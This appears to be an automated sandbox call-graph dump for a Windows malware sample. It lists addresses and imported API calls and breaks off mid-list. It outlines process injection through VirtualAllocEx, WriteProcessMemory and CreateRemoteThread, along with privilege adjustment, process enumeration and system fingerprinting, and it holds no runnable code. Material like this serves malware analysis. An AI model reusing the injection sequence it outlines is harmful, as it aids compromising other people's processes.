CloseHandle 13866->13868 13867->13448 13868->13867 13870 41de01 FindResourceA 13869->13870 13870->13859 13870->13860 14029 419a40 13871->14029 13874 419a40 42 API calls 13875 41aa81 13874->13875 13876 419a40 42 API calls 13875->13876 13877 41aaa9 CreateMutexA 13876->13877 13877->13456 13878->13458 14059 402390 13879->14059 14062 407880 13882->14062 13887 407830 42 API calls 13888 40b5af 13887->13888 13889 407830 42 API calls 13888->13889 13890 40b5c4 CreateMutexA 13889->13890 14068 408250 13890->14068 13895 405090 GetSystemDirectoryA 13896 4050f0 13895->13896 13896->13896 13897 405106 lstrcatA lstrcatA GetFileAttributesA 13896->13897 13898 405193 13897->13898 13899 405269 13897->13899 13901 41e0b0 7 API calls 13898->13901 13900 424873 _fast_error_exit 36 API calls 13899->13900 13903 40527d 13900->13903 13902 4051a7 13901->13902 13904 4051c3 13902->13904 14261 4047a0 GetCurrentProcess GetCurrentProcess OpenProcessToken 13902->14261 13903->13464 13906 424873 _fast_error_exit 36 API calls 13904->13906 13908 4051d4 13906->13908 13908->13464 13909 4051db Process32First 13910 405262 CloseHandle 13909->13910 13914 4051f2 13909->13914 13910->13899 13913 405253 Process32Next 13913->13910 13913->13914 13914->13913 14266 425c34 13914->14266 14280 404990 13914->14280 14288 404840 OpenProcess 13914->14288 14301 4084d0 WaitForSingleObject 13916->14301 13918 408b02 CloseHandle 13919 408b12 13918->13919 14304 408380 13919->14304 13921 408b96 13921->13472 14317 404050 13922->14317 13924 4045b3 13924->13477 13925->13482 14348 41a610 13926->14348 13928 41a939 13929 41a610 42 API calls 13928->13929 13930 41a967 13929->13930 13931 41a610 42 API calls 13930->13931 13932 41a994 13931->13932 13932->13524 13934 4018f0 13933->13934 13934->13934 13935 401902 ExpandEnvironmentStringsA GetLocalTime CreateFileA CloseHandle 13934->13935 13936 424873 _fast_error_exit 36 API calls 13935->13936 13937 40194f 13936->13937 13937->13473 13939 413c0a 13938->13939 13939->13939 13940 407880 42 API calls 13939->13940 13945 413cc5 13940->13945 13942 413d6d 13944 4032f0 42 API calls 13942->13944 13947 413d9f 13944->13947 13945->13942 14361 404110 13945->14361 14389 41bd00 13945->14389 14410 41baf0 13945->14410 13948 424873 _fast_error_exit 36 API calls 13947->13948 13949 413dc6 13948->13949 13949->13480 14579 4166a0 13950->14579 13952 41677e 13952->13485 15056 42cf9d 13953->15056 13955 40b349 13956 425c34 61 API calls 13955->13956 13957 40b351 13956->13957 13957->13957 13958 4028a0 42 API calls 13957->13958 13959 40b373 13958->13959 13960 4255be ___free_lc_time 36 API calls 13959->13960 13961 40b379 13960->13961 13968 40b386 13961->13968 15060 408bc0 13961->15060 13964 424873 _fast_error_exit 36 API calls 13966 40b531 13964->13966 13965 40b3d5 WaitForSingleObject 13967 407c10 42 API calls 13965->13967 13966->13490 13969 40b3f1 13967->13969 13968->13964 13970 40b3f8 ReleaseMutex 13969->13970 13971 40b41a 13969->13971 13970->13968 13972 4246fe 42 API calls 13971->13972 13973 40b425 13972->13973 13974 40b475 ReleaseMutex 13973->13974 13975 40b48e 13973->13975 13974->13968 13976 4027b0 42 API calls 13975->13976 13977 40b49c 13976->13977 13978 40b4ac 13977->13978 13979 407d30 42 API calls 13977->13979 13980 40b030 42 API calls 13978->13980 13979->13978 13981 40b4b9 13980->13981 15074 4085e0 13981->15074 13984 40b4e1 13986 40b501 ReleaseMutex 13984->13986 15079 407650 13984->15079 13985 4085e0 42 API calls 13985->13984 13986->13968 15172 41df40 13988->15172 13990 4123d8 13991 4123fb 13990->13991 14023 41679a 14022->14023 14024 4167af 14022->14024 14025 4166a0 122 API calls 14023->14025 14026 4166a0 122 API calls 14024->14026 14025->14024 14032 4246fe 14029->14032 14035 424705 __getbuf 14032->14035 14033 4263b4 __getbuf 36 API calls 14033->14035 14034 419a47 14034->13874 14035->14033 14035->14034 14037 4247e1 14035->14037 14038 424822 14037->14038 14039 4247f6 14037->14039 14054 425126 14038->14054 14050 4250e9 14039->14050 14042 424812 14044 42570f 40 API calls 14042->14044 14043 424830 14058 42509e RaiseException 14043->14058 14044->14038 14046 424841 ___initmbctable 14047 426501 _fast_error_exit 36 API calls 14046->14047 14048 42485b ExitProcess 14047->14048 14051 4250fe _strlen 14050->14051 14052 4263b4 __getbuf 36 API calls 14051->14052 14053 425105 _strcat 14052->14053 14053->14042 14055 42513e _strlen 14054->14055 14057 42514d _strcat 14054->14057 14056 4263b4 __getbuf 36 API calls 14055->14056 14056->14057 14057->14043 14058->14046 14060 4246fe 42 API calls 14059->14060 14061 402397 CreateMutexA 14060->14061 14061->13460 14063 4246fe 42 API calls 14062->14063 14064 407887 14063->14064 14065 407830 14064->14065 14066 4246fe 42 API calls 14065->14066 14067 407837 14066->14067 14067->13887 14069 408325 14068->14069 14069->14069 14070 408339 ExpandEnvironmentStringsA 14069->14070 14071 408355 14070->14071 14071->14071 14093 4028a0 14071->14093 14073 40836c 14074 424873 _fast_error_exit 36 API calls 14073->14074 14075 408379 14074->14075 14076 40b0f0 14075->14076 14077 40b124 CreateFileA 14076->14077 14079 40b2e5 14077->14079 14085 40b150 14077->14085 14080 424873 _fast_error_exit 36 API calls 14079->14080 14083 40b2f9 14080->14083 14081 40b160 SetFilePointer ReadFile 14082 40b2de CloseHandle 14081->14082 14081->14085 14082->14079 14083->13895 14084 40b197 ReadFile 14084->14082 14084->14085 14085->14081 14085->14082 14085->14084 14086 40b1bb ReadFile 14085->14086 14087 4246fe 42 API calls 14085->14087 14088 402a90 42 API calls 14085->14088 14092 4085e0 42 API calls 14085->14092 14162 407c10 14085->14162 14166 407d30 14085->14166 14170 40b030 14085->14170 14086->14082 14086->14085 14087->14085 14088->14085 14092->14085 14095 4028ad 14093->14095 14094 4028f1 14096 402902 14094->14096 14117 424762 14094->14117 14095->14094 14099 4028d4 14095->14099 14100 402915 14096->14100 14127 402250 14096->14127 14103 4027b0 14099->14103 14100->14073 14102 4028eb 14102->14073 14104 4027c3 14103->14104 14105 4027c8 14103->14105 14131 424722 14104->14131 14107 4027fa 14105->14107 14108 4027db 14105->14108 14109 402806 14107->14109 14111 424762 42 API calls 14107->14111 14147 4021d0 14108->14147 14114 402250 42 API calls 14109->14114 14116 402819 14109->14116 14111->14109 14112 4027e7 14113 4021d0 42 API calls 14112->14113 14115 4027f1 14113->14115 14114->14116 14115->14102 14116->14102 14118 42476c __EH_prolog 14117->14118 14119 402a90 42 API calls 14118->14119 14120 42477c 14119->14120 14121 402a30 42 API calls 14120->14121 14122 42478c 14121->14122 14161 42509e RaiseException 14122->14161 14124 4247a1 14125 425184 14124->14125 14126 4255be ___free_lc_time 36 API calls 14124->14126 14125->14096 14126->14125 14128 402283 14127->14128 14129 4246fe 42 API calls 14128->14129 14130 4022b9 14129->14130 14130->14100 14132 42472c __EH_prolog 14131->14132 14151 402a90 14132->14151 14138 424761 __EH_prolog 14139 402a90 42 API calls 14138->14139 14140 42477c 14139->14140 14141 402a30 42 API calls 14140->14141 14142 42478c 14141->14142 14160 42509e RaiseException 14142->14160 14144 425184 14144->14105 14145 4247a1 14145->14144 14146 4255be ___free_lc_time 36 API calls 14145->14146 14146->14144 14148 4021de 14147->14148 14150 4021e3 ___free_lc_time 14147->14150 14149 424722 42 API calls 14148->14149 14149->14150 14150->14112 14152 402ab0 14151->14152 14152->14152 14153 4028a0 42 API calls 14152->14153 14154 402ac2 14153->14154 14155 402a30 14154->14155 14156 402a52 14155->14156 14157 4027b0 42 API calls 14156->14157 14158 402a7b 14157->14158 14159 42509e RaiseException 14158->14159 14159->14138 14160->14145 14161->14124 14163 407c1f 14162->14163 14165 407c48 14163->14165 14178 402090 14163->14178 14165->14085 14167 407d40 14166->14167 14167->14167 14168 4028a0 42 API calls 14167->14168 14169 407d50 14168->14169 14169->14085 14172 40b058 14170->14172 14171 40b082 14173 4027b0 42 API calls 14171->14173 14177 40b0bd 14171->14177 14172->14171 14176 402090 42 API calls 14172->14176 14174 40b0a3 14173->14174 14182 40ae60 14174->14182 14176->14171 14177->14085 14179 40209e 14178->14179 14181 4020a3 14178->14181 14180 424722 42 API calls 14179->14180 14180->14181 14181->14165 14183 40ae6e 14182->14183 14184 40ae8f 14182->14184 14227 408620 14183->14227 14185 40aed2 14184->14185 14186 40aea4 14184->14186 14190 40aed6 14185->14190 14191 40af0d 14185->14191 14237 402400 14186->14237 14188 40ae85 14188->14177 14194 402400 42 API calls 14190->14194 14192 402400 42 API calls 14191->14192 14206 40af17 14192->14206 14197 40aee3 14194->14197 14195 40aeb6 14199 408620 42 API calls 14195->14199 14196 40afe8 14241 4088e0 14196->14241 14197->14196 14200 40aeeb 14197->14200 14198 40af77 14205 402400 42 API calls 14198->14205 14203 40aec6 14199->14203 14204 408620 42 API calls 14200->14204 14202 40aff5 14202->14177 14203->14177 14207 40af01 14204->14207 14210 40af83 14205->14210 14206->14198 14208 402400 42 API calls 14206->14208 14207->14177 14209 40af38 14208->14209 14209->14198 14211 40af3c 14209->14211 14210->14196 14212 40afad 14210->14212 14215 402400 42 API calls 14210->14215 14213 40af62 14211->14213 14214 40af4d 14211->14214 14216 40afd3 14212->14216 14217 40afbe 14212->14217 14219 408620 42 API calls 14213->14219 14218 408620 42 API calls 14214->14218 14220 40afa9 14215->14220 14223 408620 42 API calls 14216->14223 14221 408620 42 API calls 14217->14221 14222 40af56 14218->14222 14224 40af6b 14219->14224 14220->14196 14220->14212 14225 40afc7 14221->14225 14222->14177 14226 40afdc 14223->14226 14224->14177 14225->14177 14226->14177 14228 408691 14227->14228 14229 408645 14227->14229 14253 408440 14228->14253 14231 4028a0 42 API calls 14229->14231 14232 408668 14231->14232 14233 402a30 42 API calls 14232->14233 14234 40867a 14233->14234 14252 42509e RaiseException 14234->14252 14236 4086aa 14236->14188 14238 40240d 14237->14238 14239 402090 42 API calls 14238->14239 14240 402426 14239->14240 14240->14195 14240->14196 14249 408908 14241->14249 14242 4089e0 14245 402090 42 API calls 14242->14245 14243 4089bc 14244 408620 42 API calls 14243->14244 14246 4089ca 14244->14246 14247 408a0e 14245->14247 14246->14202 14248 408a3d 14247->14248 14250 408620 42 API calls 14247->14250 14248->14202 14249->14242 14249->14243 14251 408a27 14250->14251 14251->14202 14252->14228 14254 4246fe 42 API calls 14253->14254 14255 408468 14254->14255 14256 40849d 14255->14256 14258 408120 14255->14258 14256->14236 14259 4027b0 42 API calls 14258->14259 14260 40815e 14259->14260 14260->14256 14262 4047c1 LookupPrivilegeValueA 14261->14262 14263 404832 CreateToolhelp32Snapshot 14261->14263 14264 4047d7 AdjustTokenPrivileges 14262->14264 14265 404828 CloseHandle 14262->14265 14263->13904 14263->13909 14264->14265 14265->14263 14267 425c40 ___initmbctable 14266->14267 14268 426f68 __lock 36 API calls 14267->14268 14269 425c4a 14268->14269 14270 425c5d 14269->14270 14271 427a79 ___initmbctable 36 API calls 14269->14271 14272 42a027 ___initmbctable 61 API calls 14270->14272 14273 425c69 ___initmbctable 14270->14273 14271->14270 14274 425ca8 _fast_error_exit 14272->14274 14273->13914 14274->14273 14275 425cf5 14274->14275 14276 4263b4 __getbuf 36 API calls 14274->14276 14277 42a027 ___initmbctable 61 API calls 14275->14277 14278 425d1e _strcat 14275->14278 14276->14275 14277->14278 14278->14273 14279 4255be ___free_lc_time 36 API calls 14278->14279 14279->14273 14281 404a2c 14280->14281 14282 405067 14281->14282 14283 405052 14281->14283 14284 424873 _fast_error_exit 36 API calls 14282->14284 14285 424873 _fast_error_exit 36 API calls 14283->14285 14286 40507a 14284->14286 14287 405060 14285->14287 14286->13914 14287->13914 14289 40492b 14288->14289 14290 40488e lstrlenA VirtualAllocEx 14288->14290 14296 404962 14289->14296 14290->14289 14291 4048c6 WriteProcessMemory 14290->14291 14291->14289 14293 4048dd GetModuleHandleA GetProcAddress 14291->14293 14293->14289 14295 40490b CreateRemoteThread 14293->14295 14295->14289 14297 404970 14296->14297 14298 404969 CloseHandle 14296->14298 14299 404949 14297->14299 14300 40497b CloseHandle 14297->14300 14298->14297 14299->13914 14300->14299 14303 4084f1 14301->14303 14302 4085c4 ReleaseMutex 14302->13918 14303->14302 14307 408394 14304->14307 14305 408398 14305->13921 14307->14305 14307->14307 14308 407e40 14307->14308 14309 407e6b 14308->14309 14315 407eb7 14308->14315 14310 4028a0 42 API calls 14309->14310 14311 407e8e 14310->14311 14312 402a30 42 API calls 14311->14312 14313 407ea0 14312->14313 14316 42509e RaiseException 14313->14316 14315->14307 14316->14315 14320 404064 14317->14320 14318 404068 14318->13924 14320->14318 14320->14320 14321 403a80 14320->14321 14322 403aa7 14321->14322 14330 403af3 14321->14330 14323 4028a0 42 API calls 14322->14323 14324 403aca 14323->14324 14325 402a30 42 API calls 14324->14325 14326 403adc 14325->14326 14331 42509e RaiseException 14326->14331 14329 403d0d 14329->14320 14332 403530 14330->14332 14331->14330 14335 4032f0 14332->14335 14334 40356d 14334->14329 14337 403304 14335->14337 14336 403308 14336->14334 14337->14336 14339 402e40 14337->14339 14340 402e6b 14339->14340 14346 402eb7 14339->14346 14341 4028a0 42 API calls 14340->14341 14342 402e8e 14341->14342 14343 402a30 42 API calls 14342->14343 14344 402ea0 14343->14344 14347 42509e RaiseException 14344->14347 14346->14337 14347->14346 14350 41a624 14348->14350 14349 41a628 14349->13928 14350->14349 14352 41a290 14350->14352 14353 41a2b7 14352->14353 14359 41a303 14352->14359 14354 4028a0 42 API calls 14353->14354 14355 41a2da 14354->14355 14356 402a30 42 API calls 14355->14356 14357 41a2ec 14356->14357 14360 42509e RaiseException 14357->14360 14359->14350 14360->14359 14414 402bc0 14361->14414 14363 404147 WaitForSingleObject 14364 4041d0 14363->14364 14364->14364 14365 4028a0 42 API calls 14364->14365 14366 4041e4 14365->14366 14416 4029c0 14366->14416 14368 404201 14369 404244 14368->14369 14370 40428d ReleaseMutex 14368->14370 14371 404269 ReleaseMutex 14369->14371 14372 4032f0 42 API calls 14369->14372 14388 4042e1 14370->14388 14371->13945 14373 404261 14372->14373 14420 4033b0 14373->14420 14374 40451b 14374->13945 14376 40447a 14376->14374 14377 404492 WaitForSingleObject 14376->14377 14378 402a90 42 API calls 14377->14378 14379 4044b9 14378->14379 14436 403f40 14379->14436 14381 4044d2 14450 4034d0 14381->14450 14382 4028a0 42 API calls 14382->14388 14384 4044d9 14386 4044ed ReleaseMutex 14384->14386 14385 4027b0 42 API calls 14385->14388 14386->13945 14388->14374 14388->14376 14388->14382 14388->14385 14423 4031f0 14388->14423 14574 41ba60 14389->14574 14391 41bd14 14392 41bd49 14391->14392 14393 41bd2e 14391->14393 14395 41bd81 14392->14395 14408 41be17 14392->14408 14394 424873 _fast_error_exit 36 API calls 14393->14394 14396 41bd43 14394->14396 14398 41ba60 CloseHandle 14395->14398 14396->13945 14397 41bf30 14401 41c03d CreateEventA 14397->14401 14402 41c02e 14397->14402 14399 41bde2 14398->14399 14400 424873 _fast_error_exit 36 API calls 14399->14400 14403 41be11 14400->14403 14401->14402 14404 41c09e 14401->14404 14405 41ba60 CloseHandle 14402->14405 14403->13945 14406 424873 _fast_error_exit 36 API calls 14404->14406 14405->14404 14407 41c0af 14406->14407 14407->13945 14408->14397 14409 41beeb WaitForSingleObject 14408->14409 14409->14397 14411 41bafb 14410->14411 14412 41bb3d 14410->14412 14411->14412 14413 41bb12 CloseHandle 14411->14413 14412->13945 14413->13945 14415 402bd2 14414->14415 14415->14363 14418 4029cf 14416->14418 14417 4029f8 14417->14368 14418->14417 14419 402090 42 API calls 14418->14419 14419->14417 14456 403140 14420->14456 14422 4033cb 14422->14371 14422->14422 14424 403210 14423->14424 14425 403252 14423->14425 14424->14425 14433 402090 42 API calls 14424->14433 14426 403263 14425->14426 14431 403291 14425->14431 14472 402c00 14426->14472 14430 403273 14430->14388 14482 402440 14431->14482 14432 4032d5 14432->14388 14433->14424 14434 402c00 42 API calls 14435 4032c1 14434->14435 14435->14388 14437 403f67 14436->14437 14440 402090 42 API calls 14437->14440 14442 403f90 14437->14442 14438 407880 42 API calls 14439 403fa1 14438->14439 14487 403640 14439->14487 14440->14442 14442->14438 14449 40401d 14442->14449 14445 403fef 14446 403530 42 API calls 14445->14446 14447 403fff 14446->14447 14448 4032f0 42 API calls 14447->14448 14448->14449 14449->14381 14451 4034f7 14450->14451 14452 4034dc 14450->14452 14451->14384 14453 4032f0 42 API calls 14452->14453 14454 4034ef 14453->14454 14455 4033b0 42 API calls 14454->14455 14455->14451 14457 4031bf 14456->14457 14458 403176 14456->14458 14457->14422 14464 402b30 14458->14464 14461 403140 42 API calls 14462 4031b1 14461->14462 14463 403140 42 API calls 14462->14463 14463->14457 14465 4246fe 42 API calls 14464->14465 14466 402b58 14465->14466 14467 402b8d 14466->14467 14469 402ad0 14466->14469 14467->14461 14470 4027b0 42 API calls 14469->14470 14471 402b12 14470->14471 14471->14467 14473 402c71 14472->14473 14474 402c25 14472->14474 14476 402b30 42 API calls 14473->14476 14475 4028a0 42 API calls 14474->14475 14477 402c48 14475->14477 14481 402c8a 14476->14481 14478 402a30 42 API calls 14477->14478 14479 402c5a 14478->14479 14486 42509e RaiseException 14479->14486 14481->14430 14483 402474 14482->14483 14484 402451 14482->14484 14483->14432 14483->14434 14484->14483 14485 402090 42 API calls 14484->14485 14485->14483 14486->14473 14488 4027b0 42 API calls 14487->14488 14489 40367d 14488->14489 14537 403440 14489->14537 14492 403d90 14493 403d9e 14492->14493 14494 403dbf 14492->14494 14542 403750 14493->14542 14496 403e02 14494->14496 14497 403dd4 14494->14497 14499 403e06 14496->14499 14500 403e3d 14496->14500 14498 402400 42 API calls 14497->14498 14502 403dde 14498->14502 14503 402400 42 API calls 14499->14503 14504 402400 42 API calls 14500->14504 14501 403db5 14501->14445 14505 403de6 14502->14505 14506 403f18 14502->14506 14507 403e13 14503->14507 14516 403e47 14504->14516 14508 403750 42 API calls 14505->14508 14552 403900 14506->14552 14507->14506 14509 403e1b 14507->14509 14512 403df6 14508->14512 14513 403750 42 API calls 14509->14513 14511 403ea7 14514 402400 42 API calls 14511->14514 14512->14445 14517 403e31 14513->14517 14520 403eb3 14514->14520 14515 403f25 14515->14445 14516->14511 14518 402400 42 API calls 14516->14518 14517->14445 14519 403e68 14518->14519 14519->14511 14521 403e6c 14519->14521 14520->14506 14522 403edd 14520->14522 14525 402400 42 API calls 14520->14525 14523 403e92 14521->14523 14524 403e7d 14521->14524 14526 403f03 14522->14526 14527 403eee 14522->14527 14529 403750 42 API calls 14523->14529 14528 403750 42 API calls 14524->14528 14530 403ed9 14525->14530 14533 403750 42 API calls 14526->14533 14531 403750 42 API calls 14527->14531 14532 403e86 14528->14532 14534 403e9b 14529->14534 14530->14506 14530->14522 14535 403ef7 14531->14535 14532->14445 14536 403f0c 14533->14536 14534->14445 14535->14445 14536->14445 14538 407880 42 API calls 14537->14538 14539 40346b 14538->14539 14540 4033b0 42 API calls 14539->14540 14541 40349c 14540->14541 14541->14492 14543 4037c1 14542->14543 14544 403775 14542->14544 14564 4036b0 14543->14564 14546 4028a0 42 API calls 14544->14546 14547 403798 14546->14547 14548 402a30 42 API calls 14547->14548 14549 4037aa 14548->14549 14563 42509e RaiseException 14549->14563 14551 4037da 14551->14501 14553 403928 14552->14553 14554 403a00 14553->14554 14555 4039dc 14553->14555 14558 402090 42 API calls 14554->14558 14556 403750 42 API calls 14555->14556 14557 4039ea 14556->14557 14557->14515 14559 403a2e 14558->14559 14560 403a5d 14559->14560 14561 403750 42 API calls 14559->14561 14560->14515 14562 403a47 14561->14562 14562->14515 14563->14543 14565 4246fe 42 API calls 14564->14565 14566 4036d8 14565->14566 14567 40370f 14566->14567 14569 4035c0 14566->14569 14567->14551 14570 4027b0 42 API calls 14569->14570 14571 4035fe 14570->14571 14572 403440 42 API calls 14571->14572 14573 403612 14572->14573 14573->14567 14575 41ba71 14574->14575 14576 41ba6c 14574->14576 14577 41bacd 14575->14577 14578 41babf CloseHandle 14575->14578 14576->14391 14577->14391 14578->14577 14580 4246fe 42 API calls 14579->14580 14581 4166d1 CreateThread 14580->14581 14583 416733 CloseHandle 14581->14583 14584 41672a WaitForSingleObject 14581->14584 14585 415bd0 14581->14585 14583->13952 14584->14583 14586 415be0 _fast_error_exit 14585->14586 14587 416607 14586->14587 14590 415e3f 14586->14590 14588 424873 _fast_error_exit 36 API calls 14587->14588 14589 41663d 14588->14589 14592 415e46 14590->14592 14607 419ac0 GetTempPathA GetTempFileNameA 14590->14607 14637 423b1b 14592->14637 14594 416324 14641 42544d 14594->14641 14599 4165f0 14602 424873 _fast_error_exit 36 API calls 14599->14602 14600 416502 lstrlenA 14601 41655b 14600->14601 14604 416562 GetProcessHeap HeapFree 14601->14604 14648 4065d0 14601->14648 14603 4165fe 14602->14603 14604->14599 14663 4259ad 14607->14663 14610 419b41 WaitForSingleObject 14613 419b94 14610->14613 14611 41a0be 14612 424873 _fast_error_exit 36 API calls 14611->14612 14614 41a0cc 14612->14614 14666 4258f3 14613->14666 14614->14592 14638 423b22 14637->14638 14640 423b39 ___initmbctable _strncpy 14637->14640 14638->14640 14921 423870 14638->14921 14640->14594 14642 427c5b 47 API calls 14641->14642 14643 42547b 14642->14643 14645 416479 lstrlenA 14643->14645 14987 427ab4 14643->14987 14646 4013d0 14645->14646 14647 4013f4 GetProcessHeap HeapAlloc 14646->14647 14647->14599 14647->14600 14652 4065e0 _fast_error_exit 14648->14652 14649 407207 14650 424873 _fast_error_exit 36 API calls 14649->14650 14651 407222 14650->14651 14651->14604 14652->14649 14653 407229 14652->14653 14654 407245 14653->14654 14655 407277 14653->14655 14658 424873 _fast_error_exit 36 API calls 14654->14658 14656 42544d 47 API calls 14655->14656 14657 4072cb lstrlenA 14656->14657 14660 40730f 14657->14660 14659 407270 14658->14659 14659->14604 14661 424873 _fast_error_exit 36 API calls 14660->14661 14662 40735e 14661->14662 14662->14604 14694 425951 14663->14694 14665 419b30 14665->14610 14665->14611 14667 4258ff ___initmbctable 14666->14667 14755 4297f1 14667->14755 14669 42590b 14761 429b47 14669->14761 14695 42595d ___initmbctable 14694->14695 14705 429de6 14695->14705 14697 425962 14698 425978 14697->14698 14699 425969 14697->14699 14723 429bf9 14698->14723 14700 429d61 __lock 36 API calls 14699->14700 14704 42596e ___initmbctable 14700->14704 14704->14665 14706 429df2 ___initmbctable 14705->14706 14707 42758b __lock 36 API calls 14706->14707 14714 429e00 14707->14714 14708 429e71 14710 4263b4 __getbuf 36 API calls 14708->14710 14712 429e7b 14710->14712 14711 429ef4 ___initmbctable 14711->14697 14715 42b4df __lock 2 API calls 14712->14715 14717 429e6d 14712->14717 14714->14708 14716 4274eb __lock 36 API calls 14714->14716 14714->14717 14730 429820 14714->14730 14735 429872 14714->14735 14718 429e9f 14715->14718 14716->14714 14740 429eff 14717->14740 14720 429eaa 14718->14720 14721 429ebd EnterCriticalSection 14718->14721 14722 4255be ___free_lc_time 36 API calls 14720->14722 14721->14717 14722->14717 14726 429c18 14723->14726 14724 42598b 14727 4259a3 14724->14727 14726->14724 14743 42c85d 14726->14743 14749 429843 14727->14749 14729 4259ab 14729->14704 14731 429834 EnterCriticalSection 14730->14731 14732 429829 14730->14732 14731->14714 14733 42758b __lock 36 API calls 14732->14733 14734 429832 14733->14734 14734->14714 14736 429886 LeaveCriticalSection 14735->14736 14737 42987b 14735->14737 14736->14714 14738 4274d6 ___free_lc_time LeaveCriticalSection 14737->14738 14739 429884 14738->14739 14739->14714 14741 4274d6 ___free_lc_time LeaveCriticalSection 14740->14741 14742 429f06 14741->14742 14742->14711 14744 42c869 ___initmbctable 14743->14744 14745 42c576 61 API calls 14744->14745 14746 42c88a 14745->14746 14747 42c8a2 LeaveCriticalSection 14746->14747 14748 42c899 ___initmbctable 14747->14748 14748->14724 14750 429850 14749->14750 14751 429867 LeaveCriticalSection 14749->14751 14750->14751 14752 429857 14750->14752 14751->14729 14753 4274d6 ___free_lc_time LeaveCriticalSection 14752->14753 14754 429865 14753->14754 14754->14729 14756 429815 EnterCriticalSection 14755->14756 14757 4297fe 14755->14757 14756->14669 14757->14756 14758 429805 14757->14758 14759 42758b __lock 36 API calls 14758->14759 14760 429813 14759->14760 14760->14669 14762 429b54 _write_multi_char 14761->14762 14763 425916 14762->14763 14764 4263b4 __getbuf 36 API calls 14762->14764 14765 427c5b 14763->14765 14764->14763 14768 42841c 14765->14768 14773 427c92 __aulldvrm _strlen 14765->14773 14766 424873 _fast_error_exit 36 API calls 14767 425926 14766->14767 14776 429bcf 14767->14776 14768->14766 14769 427bcd 46 API calls _write_multi_char 14769->14773 14770 4263b4 __getbuf 36 API calls 14770->14773 14771 42bfe6 37 API calls 14771->14773 14772 4255be ___free_lc_time 36 API calls 14772->14773 14773->14768 14773->14769 14773->14770 14773->14771 14773->14772 14774 427c00 46 API calls _write_multi_char 14773->14774 14775 427c24 46 API calls 14773->14775 14774->14773 14775->14773 14777 429bd6 14776->14777 14778 425932 14776->14778 14777->14778 14922 4239cd 14921->14922 14930 423d15 14922->14930 14926 423a91 ___initmbctable 14926->14926 14927 423ac5 wsprintfA 14926->14927 14928 424873 _fast_error_exit 36 API calls 14927->14928 14929 423b19 14928->14929 14929->14640 14931 423d35 ___initmbctable 14930->14931 14943 4246e0 14931->14943 14933 423d79 14935 424873 _fast_error_exit 36 API calls 14933->14935 14936 423a8c 14935->14936 14939 4237f6 GetSystemDirectoryA GetVolumeInformationA 14936->14939 14938 423d41 14938->14933 14947 423b68 14938->14947 14958 4246c8 14938->14958 14940 423855 14939->14940 14941 424873 _fast_error_exit 36 API calls 14940->14941 14942 423868 14941->14942 14942->14926 14944 4246c8 14943->14944 14961 42446c 14944->14961 14948 423b75 _fast_error_exit 14947->14948 14970 423d83 14948->14970 14951 424873 _fast_error_exit 36 API calls 14954 423d13 14951->14954 14952 423c00 14956 423d83 50 API calls 14952->14956 14957 423c29 14952->14957 14953 423ca7 14955 423d83 50 API calls 14953->14955 14954->14938 14955->14957 14956->14957 14957->14951 14959 42446c 52 API calls 14958->14959 14960 4246dd 14959->14960 14960->14938 14962 423f92 14961->14962 14963 42465e RegOpenKeyExA 14962->14963 14964 42467f RegEnumKeyExA RegCloseKey 14963->14964 14969 4246b3 14963->14969 14965 4246a7 14964->14965 14964->14969 14967 4243e5 49 API calls 14965->14967 14966 424873 _fast_error_exit 36 API calls 14968 4246c3 14966->14968 14967->14969 14968->14938 14969->14966 14971 423dc3 14970->14971 14971->14971 14972 423e4a QueryDosDeviceA 14971->14972 14973 423e83 GetLastError 14972->14973 14974 423ed5 lstrcpyA lstrcatA CreateFileA 14972->14974 14975 423e8e lstrcpyA lstrcatA DefineDosDeviceA 14973->14975 14979 423ec7 14973->14979 14976 423f52 GetLastError 14974->14976 14977 423f18 DeviceIoControl 14974->14977 14978 423ec1 GetLastError 14975->14978 14975->14979 14980 423f58 14976->14980 14977->14980 14981 423f38 GetLastError 14977->14981 14978->14979 14979->14974 14982 423f82 14979->14982 14980->14982 14983 423f64 DefineDosDeviceA 14980->14983 14981->14980 14984 424873 _fast_error_exit 36 API calls 14982->14984 14983->14982 14985 423f7a GetLastError 14983->14985 14986 423bd4 14984->14986 14985->14982 14986->14952 14986->14953 14986->14957 14989 427aca _write_multi_char 14987->14989 14996 427b51 14987->14996 14988 427b28 14990 427b32 14988->14990 14991 427b96 14988->14991 14989->14988 14995 42bf18 __getbuf 36 API calls 14989->14995 14989->14996 14993 427b49 14990->14993 14997 427b56 14990->14997 14992 42be6d _write_multi_char 44 API calls 14991->14992 14992->14996 14994 42be6d _write_multi_char 44 API calls 14993->14994 14994->14996 14995->14988 14996->14645 14997->14996 14999 42bbf4 14997->14999 15000 42bc00 ___initmbctable 14999->15000 15001 42bc83 15000->15001 15003 42bc2b 15000->15003 15002 429d61 __lock 36 API calls 15001->15002 15004 42bc88 15002->15004 15005 42c1e1 _write_multi_char 37 API calls 15003->15005 15006 429d6a _write_multi_char 36 API calls 15004->15006 15007 42bc31 15005->15007 15015 42bc73 ___initmbctable 15006->15015 15008 42bc53 15007->15008 15009 42bc3f 15007->15009 15011 429d61 __lock 36 API calls 15008->15011 15017 42bb80 15009->15017 15012 42bc58 15011->15012 15014 429d6a _write_multi_char 36 API calls 15012->15014 15013 42bc4b 15028 42bc7b 15013->15028 15014->15013 15015->14996 15031 42c1a0 15017->15031 15019 42bb8b 15020 42bba1 SetFilePointer 15019->15020 15021 42bb91 15019->15021 15023 42bbc2 15020->15023 15024 42bbba GetLastError 15020->15024 15022 429d61 __lock 36 API calls 15021->15022 15025 42bb96 15022->15025 15026 42bbce 15023->15026 15038 429d73 15023->15038 15024->15023 15025->15013 15026->15013 15055 42c281 LeaveCriticalSection 15028->15055 15030 42bc81 15030->15015 15032 42c1ac 15031->15032 15033 42c1c7 15032->15033 15034 429d61 __lock 36 API calls 15032->15034 15033->15019 15035 42c1cf 15034->15035 15036 429d6a _write_multi_char 36 API calls 15035->15036 15037 42c1da 15036->15037 15037->15019 15039 426f68 __lock 36 API calls 15038->15039 15040 429d79 15039->15040 15041 429da9 15040->15041 15042 429d91 15040->15042 15043 426f68 __lock 36 API calls 15041->15043 15045 429d9b 15042->15045 15046 429dba 15042->15046 15044 429dae 15043->15044 15044->15026 15050 426f68 __lock 36 API calls 15045->15050 15047 429dd8 15046->15047 15048 429dca 15046->15048 15049 426f68 __lock 36 API calls 15047->15049 15051 426f68 __lock 36 API calls 15048->15051 15052 429ddd 15049->15052 15053 429da0 15050->15053 15054 429dcf 15051->15054 15052->15026 15053->15026 15054->15026 15055->15030 15057 42cfa6 _strlen 15056->15057 15059 42cfb3 _strcat 15056->15059 15058 4263b4 __getbuf 36 API calls 15057->15058 15058->15059 15059->13955 15063 408c01 _strrchr 15060->15063 15068 408bfa 15060->15068 15061 424873 _fast_error_exit 